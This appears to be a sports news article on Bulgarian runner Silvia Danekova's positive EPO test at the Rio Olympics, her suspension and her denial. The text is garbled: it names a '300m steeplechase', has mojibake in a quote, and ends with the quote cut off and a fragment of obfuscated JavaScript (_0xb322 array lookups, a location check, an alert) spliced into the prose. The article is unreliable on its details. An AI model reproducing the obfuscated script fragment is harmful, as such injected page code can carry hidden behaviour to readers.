Bulgarian runner Silvia Danekova tested positive for the banned blood booster Erythropoietin.

Silvia Danekova has been suspended till the arrival of sample B results. If the Bulgarian is found blameworthy, she will face a 4 year long ban. The 33 year old was about to participate in the 300m steeplechase event on Monday. But the banned blood booster EPO found in her blood has reduced her chances for appearing in the event.

Endurance athletes such as middle and long distance runners and cyclists usually consume such a substance as it increases the red blood cells. The Bulgarian was shocked after seeing the results of her blood sample stating that she had never consumed such a product and also indicated towards the only chance of its origin inside her body from the intake of contaminated food supplement. Danekova produced a below average performance in London Olympics 2012 when she could not go beyond the heats.

Bulgariaas sports ministry were quite unhappy about this event. They have clearly stated that it is very shameful for a player to consume such banned products as she is representing the whole of Bulgaria. Bulgarian history is not that pleasing to be remembered as there are a huge number of times when Bulgarian athletes have been found guilty in dope tests. The whole of weightlifting squad was banned from Rio with continuous offences with regards to consumption of banned substances.

Silvia Danekova waits patiently for the sample B results. She expressed her frustration and said that it was a very ugly feeling after knowing the Test results. She has also pointed towards the mediocre hospitality arrangements at Rio. a?Weave been living here for 20 days and I have not bathed with warm watera?, Said Silvia Danekova. t(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
